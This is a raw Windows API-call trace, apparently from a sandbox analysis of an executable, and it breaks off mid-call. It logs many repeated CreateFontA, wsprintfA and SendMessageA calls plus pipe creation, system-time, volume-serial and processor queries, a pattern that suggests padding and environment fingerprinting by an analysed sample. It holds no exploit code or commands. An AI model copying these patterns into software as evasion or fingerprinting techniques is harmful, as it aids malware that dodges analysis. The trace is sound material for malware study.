[0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a7 [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a8 [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08a9 [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08aa [0037.375] GetLastError () returned 0x715 [0037.375] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.375] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08ab [0037.375] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08ac [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08ad [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08ae [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08af [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b0 [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b1 [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b2 [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b3 [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b4 [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b5 [0037.376] GetLastError () returned 0x715 [0037.376] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.376] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b6 [0037.376] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b7 [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b8 [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08b9 [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08ba [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08bb [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08bc [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08bd [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08be [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08bf [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c0 [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c1 [0037.377] GetLastError () returned 0x715 [0037.377] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.377] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c2 [0037.378] GetLastError () returned 0x715 [0037.378] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.378] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c3 [0037.378] GetLastError () returned 0x715 [0037.378] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.378] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c4 [0037.378] GetLastError () returned 0x715 [0037.378] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.378] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c5 [0037.378] GetLastError () returned 0x715 [0037.378] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.378] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c6 [0037.378] GetLastError () returned 0x715 [0037.378] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.378] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c7 [0037.378] GetLastError () returned 0x715 [0037.378] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.378] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c8 [0037.378] GetLastError () returned 0x715 [0037.378] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.378] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08c9 [0037.378] GetLastError () returned 0x715 [0037.378] SetBoundsRect (hdc=0x0, lprect=0x0, flags=0x0) returned 0x0 [0037.378] CreateFontA (cHeight=30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=0, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x81, iOutPrecision=0x3, iClipPrecision=0x2, iQuality=0x1, iPitchAndFamily=0x12, pszFaceName="u") returned 0x10a08ca [0037.378] GetLastError () returned 0x715 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] wsprintfA (in: param_1=0x18ca48, param_2="Save current changes in %s?" | out: param_1="Save current changes in ?") returned 25 [0037.450] MoveWindow (hWnd=0x0, X=0, Y=0, nWidth=0, nHeight=0, bRepaint=1) returned 0 [0037.454] SetWindowTextA (hWnd=0x0, lpString="Ô") returned 0 [0037.454] IsWindow (hWnd=0x0) returned 0 [0037.454] GetProcAddress (hModule=0x76600000, lpProcName="HeapCreate") returned 0x76614a2d [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] SendMessageA (hWnd=0x0, Msg=0x405, wParam=0x0, lParam=0x0) returned 0x0 [0037.455] GetClassNameA (in: hWnd=0x0, lpClassName=0x10030a10, nMaxCount=32 | out: lpClassName="") returned 0 [0037.455] IsDlgButtonChecked (hDlg=0x0, nIDButton=-344320543) returned 0x0 [0037.457] GetStdHandle (nStdHandle=0x76fa3c74) returned 0xffffffff [0037.457] GetStdHandle (nStdHandle=0xeb7a15e1) returned 0xffffffff [0037.457] SetHandleInformation (hObject=0x0, dwMask=0x76fa3c74, dwFlags=0x0) returned 0 [0037.457] CreatePipe (in: hReadPipe=0x18a448, hWritePipe=0x18a430, lpPipeAttributes=0x18a424, nSize=0x0 | out: hReadPipe=0x18a448*=0x17c, hWritePipe=0x18a430*=0x180) returned 1 [0037.457] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.457] CloseHandle (hObject=0x17c) returned 1 [0037.458] CloseHandle (hObject=0x180) returned 1 [0037.458] GetSystemTime (in: lpSystemTime=0x189ef0 | out: lpSystemTime=0x189ef0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.458] OpenFile (in: lpFileName="", lpReOpenBuff=0x189f08, uStyle=0xf82f | out: lpReOpenBuff=0x189f08) returned 0xffffffff [0037.458] GetFileTime (in: hFile=0x745f27e9, lpCreationTime=0x189f98, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x189f98*(dwLowDateTime=0x0, dwHighDateTime=0x18a044), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.458] FileTimeToSystemTime (in: lpFileTime=0x189f98, lpSystemTime=0x189ee0 | out: lpSystemTime=0x189ee0) returned 1 [0037.458] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x189b18, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x189b88, lpMaximumComponentLength=0x189a78, lpFileSystemFlags=0x189a80, lpFileSystemNameBuffer=0x189a88, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x189b88*=0x9c354b42, lpMaximumComponentLength=0x189a78*=0xff, lpFileSystemFlags=0x189a80*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.459] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.459] GetStdHandle (nStdHandle=0x7ab) returned 0xffffffff [0037.459] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.459] GetSystemTime (in: lpSystemTime=0x1899a8 | out: lpSystemTime=0x1899a8*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.459] OpenFile (in: lpFileName="", lpReOpenBuff=0x1899c0, uStyle=0x0 | out: lpReOpenBuff=0x1899c0) returned 0xffffffff [0037.459] GetFileTime (in: hFile=0x0, lpCreationTime=0x189a4c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x189a4c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.459] FileTimeToSystemTime (in: lpFileTime=0x189a4c, lpSystemTime=0x189998 | out: lpSystemTime=0x189998) returned 1 [0037.459] CreatePipe (in: hReadPipe=0x189994, hWritePipe=0x18997c, lpPipeAttributes=0x189970, nSize=0x0 | out: hReadPipe=0x189994*=0x180, hWritePipe=0x18997c*=0x17c) returned 1 [0037.459] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.459] CloseHandle (hObject=0x180) returned 1 [0037.459] CloseHandle (hObject=0x17c) returned 1 [0037.459] GetSystemMetrics (nIndex=19) returned 1 [0037.459] GetSystemMetrics (nIndex=23) returned 0 [0037.459] GetSystemInfo (in: lpSystemInfo=0x18949c | out: lpSystemInfo=0x18949c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.459] GetSystemTime (in: lpSystemTime=0x189098 | out: lpSystemTime=0x189098*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.460] OpenFile (in: lpFileName="", lpReOpenBuff=0x1890b0, uStyle=0x7aa | out: lpReOpenBuff=0x1890b0) returned 0x0 [0037.460] GetFileTime (in: hFile=0x0, lpCreationTime=0x18913c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x18913c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.460] FileTimeToSystemTime (in: lpFileTime=0x18913c, lpSystemTime=0x189088 | out: lpSystemTime=0x189088) returned 1 [0037.460] CreatePipe (in: hReadPipe=0x188d30, hWritePipe=0x188d18, lpPipeAttributes=0x188d0c, nSize=0x0 | out: hReadPipe=0x188d30*=0x17c, hWritePipe=0x188d18*=0x180) returned 1 [0037.460] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.460] CloseHandle (hObject=0x17c) returned 1 [0037.460] CloseHandle (hObject=0x180) returned 1 [0037.460] GetSystemTime (in: lpSystemTime=0x1887d8 | out: lpSystemTime=0x1887d8*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.460] OpenFile (in: lpFileName="", lpReOpenBuff=0x1887f0, uStyle=0x0 | out: lpReOpenBuff=0x1887f0) returned 0xffffffff [0037.460] GetFileTime (in: hFile=0x0, lpCreationTime=0x188880, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x188880*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.460] FileTimeToSystemTime (in: lpFileTime=0x188880, lpSystemTime=0x1887c8 | out: lpSystemTime=0x1887c8) returned 1 [0037.460] GetSystemTime (in: lpSystemTime=0x1883c8 | out: lpSystemTime=0x1883c8*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.460] OpenFile (in: lpFileName="", lpReOpenBuff=0x1883e0, uStyle=0x0 | out: lpReOpenBuff=0x1883e0) returned 0xffffffff [0037.460] GetFileTime (in: hFile=0x0, lpCreationTime=0x18846c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x18846c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.460] FileTimeToSystemTime (in: lpFileTime=0x18846c, lpSystemTime=0x1883b8 | out: lpSystemTime=0x1883b8) returned 1 [0037.460] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.460] GetStdHandle (nStdHandle=0x1ea9) returned 0xffffffff [0037.460] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.460] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x188320, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x188390, lpMaximumComponentLength=0x188280, lpFileSystemFlags=0x188288, lpFileSystemNameBuffer=0x188290, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x188390*=0x0, lpMaximumComponentLength=0x188280*=0x0, lpFileSystemFlags=0x188288*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.460] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.460] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.460] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.460] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x187e98, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x187f04, lpMaximumComponentLength=0x187df8, lpFileSystemFlags=0x187e00, lpFileSystemNameBuffer=0x187e08, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x187f04*=0x0, lpMaximumComponentLength=0x187df8*=0x0, lpFileSystemFlags=0x187e00*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.460] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.460] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.460] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.460] CreatePipe (in: hReadPipe=0x187a7c, hWritePipe=0x187a64, lpPipeAttributes=0x187a58, nSize=0x0 | out: hReadPipe=0x187a7c*=0x180, hWritePipe=0x187a64*=0x17c) returned 1 [0037.461] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.461] CloseHandle (hObject=0x180) returned 1 [0037.461] CloseHandle (hObject=0x17c) returned 1 [0037.461] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x187560, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x1875cc, lpMaximumComponentLength=0x1874c0, lpFileSystemFlags=0x1874c8, lpFileSystemNameBuffer=0x1874d0, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x1875cc*=0x0, lpMaximumComponentLength=0x1874c0*=0x0, lpFileSystemFlags=0x1874c8*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.461] GetSystemTime (in: lpSystemTime=0x1870c0 | out: lpSystemTime=0x1870c0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3ca)) [0037.461] OpenFile (in: lpFileName="", lpReOpenBuff=0x1870d8, uStyle=0x0 | out: lpReOpenBuff=0x1870d8) returned 0xffffffff [0037.461] GetFileTime (in: hFile=0x0, 